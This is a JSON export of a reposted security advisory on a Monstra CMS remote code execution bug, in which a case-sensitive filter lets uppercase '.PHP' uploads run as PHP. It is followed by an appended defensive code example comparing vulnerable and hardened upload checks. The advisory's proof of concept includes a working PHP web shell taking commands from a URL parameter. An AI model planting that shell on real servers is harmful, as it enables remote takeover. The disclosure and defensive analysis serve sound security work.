{"id":10741,"date":"2017-12-06T14:19:18","date_gmt":"2017-12-06T22:19:18","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2017\/12\/06\/news-4513\/"},"modified":"2017-12-06T14:19:18","modified_gmt":"2017-12-06T22:19:18","slug":"news-4513","status":"publish","type":"post","link":"https:\/\/www.palada.net\/index.php\/2017\/12\/06\/news-4513\/","title":{"rendered":"SSD Advisory \u2013 Monstra CMS RCE"},"content":{"rendered":"<p><strong>Credit to Author: SSD \/ Noam Rathaus| Date: Wed, 06 Dec 2017 06:35:44 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<div class=\"pf-content\">\n<p><strong>Vulnerabilities Summary<\/strong><br \/> The following advisory describes a vulnerability found in Monstra CMS.<\/p>\n<p>Monstra is &#8220;a modern and lightweight Content Management System. 
It is Easy to install, upgrade and use.&#8221;<\/p>\n<p>The vulnerability is a remote code execution through the file upload mechanism: the upload filter can be bypassed to place an arbitrary PHP file on the server.<\/p>\n<p><strong>Credit<\/strong><br \/> An independent security researcher, Ishaq Mohammed, reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program.<\/p>\n<p><strong>Vendor response<\/strong><br \/> We were not able to get the vendor to respond in any way. The software appears to have been abandoned without support, though this is not an official status on their site (the last official patch was released on 2012-11-29); the GitHub repository appears a bit more active (last commit two years ago).<\/p>\n<p>Without any vendor response, the researcher was kind enough to create a patch that addresses this bug; it is available here: https:\/\/github.com\/monstra-cms\/monstra\/issues\/426<\/p>\n<p><strong>Vulnerabilities details<\/strong><br \/> An Editor can upload files to Monstra CMS and open them by clicking on them in the administrator portal. The default setup allows uploads only with certain extensions, forbidding the executable file extensions listed in <em>monstra\/plugins\/box\/filesmanager\/filesmanager.admin.php<\/em>. 
However, the extension check is case-sensitive: uploading a PHP file whose extension is \u201cPHP\u201d (all characters in uppercase) bypasses this mechanism, and on a web server whose handler mapping is case-insensitive (as Apache\u2019s mod_mime is), the uploaded <em>.PHP<\/em> file is executed as PHP, allowing an authenticated Editor to run shell commands on the server.<\/p>\n<p><strong>Proof of Concept<\/strong><br \/> Steps to Reproduce:<\/p>\n<ol>\n<li>Log in with valid credentials of an Editor.<\/li>\n<li>Select the Files option from the Content dropdown menu.<\/li>\n<li>Upload a file with a PHP (uppercase) extension containing the following code:\n<pre><code>&lt;?php\n    $cmd = $_GET['cmd'];\n    system($cmd);\n?&gt;<\/code><\/pre>\n<\/li>\n<li>Click on Upload.<\/li>\n<li>Once the file is uploaded, click on it and append <code>?cmd=<\/code> to the URL followed by a system command such as <code>whoami<\/code>, <code>time<\/code> or <code>date<\/code>.<\/li>\n<\/ol>\n<\/div><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3559\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><strong>Credit to Author: SSD \/ Noam Rathaus| Date: Wed, 06 Dec 2017 06:35:44 +0000<\/strong><\/p>\n<p>Vulnerabilities Summary The following advisory describes a vulnerability found in Monstra CMS. Monstra is &#8220;a modern and lightweight Content Management System. 
It is Easy to install, upgrade and use.&#8221; The vulnerability found is a remote code execution vulnerability through an arbitrary file upload mechanism. Credit An independent security researcher, Ishaq Mohammed, has reported this vulnerability &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3559\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD Advisory \u2013 Monstra CMS RCE<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[11682,10757],"class_list":["post-10741","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-remote-code-execution","tag-securiteam-secure-disclosure"],"_links":{"self":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/10741","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=10741"}],"version-history":[{"count":0,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/10741\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=10741"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=10741"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=10741"}],"curies":[{"name":"wp","href":"
https:\/\/api.w.org\/{rel}","templated":true}]}}
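The advisory above describes the bug but does not show the filter logic. The following is an added illustrative example, not code from Monstra or from the advisory: a case-sensitive extension blacklist of the kind the advisory describes, beside a hardened allowlist check, both run over constructed sample filenames. The FORBIDDEN_EXTENSIONS and ALLOWED_EXTENSIONS lists are assumptions standing in for the real lists in filesmanager.admin.php, and the function names are hypothetical. The example relies on one fact about the deployment platform: Apache's mod_mime matches extensions case-insensitively, so a stored .PHP file is executed exactly like .php.

```php
<?php
// Added illustrative example (not Monstra's code): a case-sensitive extension
// blacklist that the ".PHP" upload bypasses, beside an allowlist check that
// normalises case and inspects every dotted component of the name.
// FORBIDDEN_EXTENSIONS and ALLOWED_EXTENSIONS are assumed stand-ins, not the
// real lists from filesmanager.admin.php.
declare(strict_types=1);

const FORBIDDEN_EXTENSIONS = ['php', 'php3', 'php4', 'php5', 'phtml', 'phar', 'cgi', 'pl', 'sh', 'htaccess'];
const ALLOWED_EXTENSIONS   = ['jpg', 'jpeg', 'png', 'gif', 'pdf', 'txt', 'zip'];

/**
 * Vulnerable check: compares the raw extension against the blacklist with a
 * case-sensitive in_array(). "shell.PHP" yields the extension "PHP", which is
 * not in the list, so the upload is accepted even though Apache's mod_mime
 * maps extensions case-insensitively and will run the file as PHP.
 */
function isAllowedVulnerable(string $filename): bool
{
    $ext = pathinfo($filename, PATHINFO_EXTENSION);
    return !in_array($ext, FORBIDDEN_EXTENSIONS, true);
}

/**
 * Hardened check:
 *  - reject empty names, path separators and NUL bytes outright,
 *  - lower-case the name before comparing,
 *  - use an allowlist instead of a blacklist,
 *  - require every dotted component after the base name to be allowed, so
 *    "shell.php.jpg" or "shell.PhP.txt" cannot smuggle a server-side
 *    extension past the filter,
 *  - reject dotfiles such as ".htaccess", which could re-map handlers.
 */
function isAllowedHardened(string $filename): bool
{
    if ($filename === '' || strpbrk($filename, "/\\\0") !== false) {
        return false;
    }
    $parts = explode('.', strtolower($filename));
    if (count($parts) < 2 || $parts[0] === '') {
        return false; // no extension at all, or a dotfile
    }
    array_shift($parts); // drop the base name, keep every extension
    foreach ($parts as $ext) {
        if (!in_array($ext, ALLOWED_EXTENSIONS, true)) {
            return false;
        }
    }
    return true;
}

/**
 * Runs both checks over constructed sample filenames and returns
 * [filename => [vulnerable_result, hardened_result]] (true = upload allowed).
 */
function compareChecks(): array
{
    $samples = [
        'report.pdf',    // legitimate upload: both allow
        'shell.php',     // caught by both
        'shell.PHP',     // the bypass from the advisory: vulnerable allows
        'shell.PhP',     // mixed-case variant: vulnerable allows
        'shell.php.jpg', // double extension: vulnerable allows
        'shell.phtml',   // alternative PHP handler extension: both deny
        '.htaccess',     // dotfile: both deny
    ];
    $out = [];
    foreach ($samples as $name) {
        $out[$name] = [isAllowedVulnerable($name), isAllowedHardened($name)];
    }
    return $out;
}

foreach (compareChecks() as $name => [$vuln, $hard]) {
    printf("%-16s vulnerable=%-5s hardened=%s\n",
        $name, $vuln ? 'allow' : 'deny', $hard ? 'allow' : 'deny');
}
```

Run with `php example.php`; the rows for `shell.PHP`, `shell.PhP` and `shell.php.jpg` show the blacklist accepting what the allowlist rejects. Extension filtering is only one layer: the upload directory should also be served without a script handler (or kept outside the web root), so that a filter slip does not become code execution.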